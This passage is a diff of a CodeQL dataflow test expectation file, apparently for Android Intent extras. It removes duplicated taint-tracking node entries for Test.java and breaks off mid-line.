[android.content.Intent.extras, ] : Intent | semmle.label | out : Intent [android.content.Intent.extras, ] : Intent | -| Test.java:99:38:99:40 | out : Intent [android.content.Intent.extras, ] : Intent | semmle.label | out : Intent [android.content.Intent.extras, ] : Intent | | Test.java:104:16:104:76 | (...)... : Intent [android.content.Intent.extras, ] : Object | semmle.label | (...)... : Intent [android.content.Intent.extras, ] : Object | | Test.java:104:24:104:76 | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | semmle.label | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | | Test.java:104:45:104:75 | newBundleWithMapValue(...) : Bundle [] : Object | semmle.label | newBundleWithMapValue(...) : Bundle [] : Object | @@ -2810,21 +2147,17 @@ nodes | Test.java:244:16:244:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:244:24:244:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:245:4:245:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:245:4:245:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:245:38:245:39 | in : String | semmle.label | in : String | | Test.java:246:9:246:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:246:19:246:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:246:36:246:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:246:36:246:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:251:19:251:37 | (...)... : ArrayList | semmle.label | (...)... : ArrayList | | Test.java:251:30:251:37 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:252:4:252:6 | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:252:4:252:6 | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:252:44:252:45 | in : ArrayList | semmle.label | in : ArrayList | | Test.java:253:9:253:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:253:21:253:41 | getIntent_extras(...) : Bundle [] : ArrayList | semmle.label | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:253:38:253:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:253:38:253:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:258:16:258:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:258:24:258:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:259:10:259:11 | in : Intent | semmle.label | in : Intent | @@ -2948,435 +2281,339 @@ nodes | Test.java:426:16:426:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:426:24:426:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:427:4:427:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:427:4:427:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:427:17:427:18 | in : String | semmle.label | in : String | | Test.java:428:9:428:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:428:19:428:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:428:36:428:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:428:36:428:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:433:16:433:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:433:24:433:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:434:4:434:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:434:4:434:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:434:17:434:18 | in : String | semmle.label | in : String | | Test.java:435:9:435:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:435:19:435:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:435:36:435:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:435:36:435:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:440:16:440:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:440:24:440:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:441:4:441:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:441:4:441:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:441:17:441:18 | in : String | semmle.label | in : String | | Test.java:442:9:442:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:442:19:442:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:442:36:442:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:442:36:442:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:447:16:447:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:447:24:447:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:448:4:448:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:448:4:448:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:448:17:448:18 | in : String | semmle.label | in : String | | Test.java:449:9:449:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:449:19:449:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:449:36:449:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:449:36:449:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:454:16:454:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:454:24:454:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:455:4:455:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:455:4:455:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:455:17:455:18 | in : String | semmle.label | in : String | | Test.java:456:9:456:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:456:19:456:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:456:36:456:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:456:36:456:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:461:16:461:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:461:24:461:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:462:4:462:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:462:4:462:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:462:17:462:18 | in : String | semmle.label | in : String | | Test.java:463:9:463:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:463:19:463:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:463:36:463:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:463:36:463:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:468:16:468:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:468:24:468:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:469:4:469:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:469:4:469:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:469:17:469:18 | in : String | semmle.label | in : String | | Test.java:470:9:470:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:470:19:470:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:470:36:470:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:470:36:470:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:475:16:475:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:475:24:475:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:476:4:476:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:476:4:476:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:476:17:476:18 | in : String | semmle.label | in : String | | Test.java:477:9:477:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:477:19:477:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:477:36:477:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:477:36:477:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:482:16:482:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:482:24:482:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:483:4:483:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:483:4:483:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:483:17:483:18 | in : String | semmle.label | in : String | | Test.java:484:9:484:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:484:19:484:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:484:36:484:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:484:36:484:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:489:16:489:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:489:24:489:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:490:4:490:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:490:4:490:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:490:17:490:18 | in : String | semmle.label | in : String | | Test.java:491:9:491:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:491:19:491:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:491:36:491:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:491:36:491:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:496:16:496:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:496:24:496:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:497:4:497:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:497:4:497:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:497:17:497:18 | in : String | semmle.label | in : String | | Test.java:498:9:498:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:498:19:498:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:498:36:498:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:498:36:498:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:503:16:503:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:503:24:503:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:504:4:504:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:504:4:504:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:504:17:504:18 | in : String | semmle.label | in : String | | Test.java:505:9:505:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:505:19:505:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:505:36:505:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:505:36:505:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:510:16:510:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:510:24:510:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:511:4:511:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:511:4:511:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:511:17:511:18 | in : String | semmle.label | in : String | | Test.java:512:9:512:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:512:19:512:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:512:36:512:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:512:36:512:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:517:16:517:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:517:24:517:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:518:4:518:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:518:4:518:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:518:17:518:18 | in : String | semmle.label | in : String | | Test.java:519:9:519:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:519:19:519:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:519:36:519:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:519:36:519:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:524:16:524:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:524:24:524:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:525:4:525:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:525:4:525:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:525:17:525:18 | in : String | semmle.label | in : String | | Test.java:526:9:526:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:526:19:526:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:526:36:526:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:526:36:526:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:531:16:531:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:531:24:531:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:532:4:532:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:532:4:532:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:532:17:532:18 | in : String | semmle.label | in : String | | Test.java:533:9:533:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:533:19:533:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:533:36:533:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:533:36:533:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:538:16:538:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:538:24:538:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:539:4:539:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:539:4:539:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:539:17:539:18 | in : String | semmle.label | in : String | | Test.java:540:9:540:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:540:19:540:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:540:36:540:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:540:36:540:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:545:16:545:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:545:24:545:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:546:4:546:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:546:4:546:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:546:17:546:18 | in : String | semmle.label | in : String | | Test.java:547:9:547:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:547:19:547:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:547:36:547:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:547:36:547:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:552:16:552:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:552:24:552:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:553:4:553:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:553:4:553:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:553:17:553:18 | in : String | semmle.label | in : String | | Test.java:554:9:554:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:554:19:554:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:554:36:554:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:554:36:554:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:559:16:559:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:559:24:559:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:560:4:560:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:560:4:560:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:560:17:560:18 | in : String | semmle.label | in : String | | Test.java:561:9:561:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:561:19:561:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:561:36:561:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:561:36:561:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:566:16:566:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:566:24:566:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:567:4:567:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:567:4:567:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:567:17:567:18 | in : String | semmle.label | in : String | | Test.java:568:9:568:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:568:19:568:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:568:36:568:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:568:36:568:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:573:16:573:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:573:24:573:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:574:4:574:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:574:4:574:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:574:17:574:18 | in : String | semmle.label | in : String | | Test.java:575:9:575:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:575:19:575:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:575:36:575:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:575:36:575:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:580:16:580:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:580:24:580:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:581:4:581:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:581:4:581:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:581:17:581:18 | in : String | semmle.label | in : String | | Test.java:582:9:582:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:582:19:582:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:582:36:582:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:582:36:582:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:587:16:587:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:587:24:587:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:588:4:588:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:588:4:588:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:588:17:588:18 | in : String | semmle.label | in : String | | Test.java:589:9:589:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:589:19:589:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:589:36:589:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:589:36:589:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:594:17:594:33 | (...)... : short[] | semmle.label | (...)... : short[] | | Test.java:594:26:594:33 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:595:4:595:6 | out [post update] : Intent [android.content.Intent.extras, ] : short[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : short[] | -| Test.java:595:4:595:6 | out [post update] : Intent [android.content.Intent.extras, ] : short[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : short[] | | Test.java:595:31:595:32 | in : short[] | semmle.label | in : short[] | | Test.java:596:9:596:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:596:21:596:41 | getIntent_extras(...) : Bundle [] : short[] | semmle.label | getIntent_extras(...) : Bundle [] : short[] | | Test.java:596:38:596:40 | out : Intent [android.content.Intent.extras, ] : short[] | semmle.label | out : Intent [android.content.Intent.extras, ] : short[] | -| Test.java:596:38:596:40 | out : Intent [android.content.Intent.extras, ] : short[] | semmle.label | out : Intent [android.content.Intent.extras, ] : short[] | | Test.java:601:15:601:29 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:601:22:601:29 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:602:4:602:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:602:4:602:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:602:31:602:32 | in : Number | semmle.label | in : Number | | Test.java:603:9:603:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:603:21:603:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) : Bundle [] : Number | | Test.java:603:38:603:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:603:38:603:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:608:16:608:31 | (...)... : long[] | semmle.label | (...)... : long[] | | Test.java:608:24:608:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:609:4:609:6 | out [post update] : Intent [android.content.Intent.extras, ] : long[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : long[] | -| Test.java:609:4:609:6 | out [post update] : Intent [android.content.Intent.extras, ] : long[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : long[] | | Test.java:609:31:609:32 | in : long[] | semmle.label | in : long[] | | Test.java:610:9:610:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:610:21:610:41 | getIntent_extras(...) : Bundle [] : long[] | semmle.label | getIntent_extras(...) : Bundle [] : long[] | | Test.java:610:38:610:40 | out : Intent [android.content.Intent.extras, ] : long[] | semmle.label | out : Intent [android.content.Intent.extras, ] : long[] | -| Test.java:610:38:610:40 | out : Intent [android.content.Intent.extras, ] : long[] | semmle.label | out : Intent [android.content.Intent.extras, ] : long[] | | Test.java:615:14:615:27 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:615:20:615:27 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:616:4:616:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:616:4:616:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:616:31:616:32 | in : Number | semmle.label | in : Number | | Test.java:617:9:617:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:617:21:617:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) : Bundle [] : Number | | Test.java:617:38:617:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:617:38:617:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent 